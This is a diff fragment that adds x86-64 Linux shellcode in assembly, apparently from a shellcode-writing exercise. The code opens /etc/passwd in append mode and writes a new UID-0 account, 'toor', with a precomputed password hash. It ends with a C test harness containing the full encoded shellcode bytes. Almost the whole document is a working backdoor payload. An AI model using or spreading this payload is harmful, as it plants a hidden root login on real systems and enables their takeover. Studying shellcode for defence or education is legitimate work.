+    mov ebx, 0x647773ff             ; swd
+    shr ebx, 0x08
+    push rbx
+    mov rbx, 0x7361702f6374652f     ; /etc/pas
+    push rbx 
+    mov rdi, rsp                    ; rdi -> /etc/passwd 
+    xchg esi, edx                   ; swap registers to zero out rsi 
+    mov si, 0x401                   ; rsi -> O_WRONLY|O_APPEND
+    add al, 0x2                     ; rax -> 2 (open)
+    syscall                         ; open 
+
+    xchg rdi, rax                   ; save returned fd
+    
+    jmp short get_entry_address     ; start jmp-call-pop 
+    
+write_entry:
+    ; #define __NR_write 1
+    ; ssize_t write(int fd, const void *buf, size_t count);
+    ; rax -> 1 
+    ; rdi -> results of open syscall 
+    ; rsi -> user's entry 
+    ; rdx -> len of user's entry 
+    pop rsi                         ; end jmp-call-pop, rsi -> user's entry  
+    push 0x1                        
+    pop rax                         ; rax -> 1
+    push 38                         ; length + 1 for newline 
+    pop rdx                         ; rdx -> length of user's entry 
+    syscall                         ; write
+
+    ; #define __NR_exit 60
+    ; void _exit(int status);
+    ; rax -> 60 
+    ; rdi -> don't care 
+    push 60
+    pop rax
+    syscall                         ; OS will handle closing fd at exit 
+    
+get_entry_address:
+    call write_entry
+    user_entry: db "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh",0xa
+    ; if the user_entry above is modified, change the _count_ argument in the write call to match the new length
+    ; openssl passwd -crypt
+    ; Password: toor
+    ; Verifying - Password: toor
+    ; sXuCKi7k3Xh/s
+
+; Skeleton for testing 
+; 
+; gcc -fno-stack-protector -z execstack shellcode-skeleton.c -o shellcode-skeleton
+; 
+; #include <stdio.h>
+; #include <string.h>
+;
+; unsigned char shellcode[] = \
+; "\x31\xdb\xf7\xe3\x50\xbb\xff\x73\x77\x64\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73\x53\x48\x89\xe7\x87\xf2\x66\xbe\x01\x04\x04\x02\x0f\x05\x48\x97\xeb\x0e\x5e\x6a\x01\x58\x6a\x26\x5a\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xed\xff\xff\xff\x74\x6f\x6f\x72\x3a\x73\x58\x75\x43\x4b\x69\x37\x6b\x33\x58\x68\x2f\x73\x3a\x30\x3a\x30\x3a\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a";
+;
+; int main() {
+;   printf("Shellcode length: %zu\n", strlen(shellcode));
+;   int (*ret)() = (int(*)())shellcode;
+;   ret();
+; }
\ No newline at end of file